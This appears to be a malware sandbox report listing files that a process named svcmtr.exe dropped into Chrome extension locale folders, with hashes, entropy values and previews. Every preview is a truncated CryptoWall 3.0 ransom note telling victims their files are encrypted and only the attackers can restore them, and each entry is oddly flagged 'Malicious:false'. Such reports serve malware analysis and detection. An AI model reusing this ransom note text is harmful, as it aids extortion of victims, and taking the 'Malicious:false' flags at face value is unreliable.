                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hy\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hy\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\id\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\id\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\is\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\is\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\it\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\it\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\iw\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\iw\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ja\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ja\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ka\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ka\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kk\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
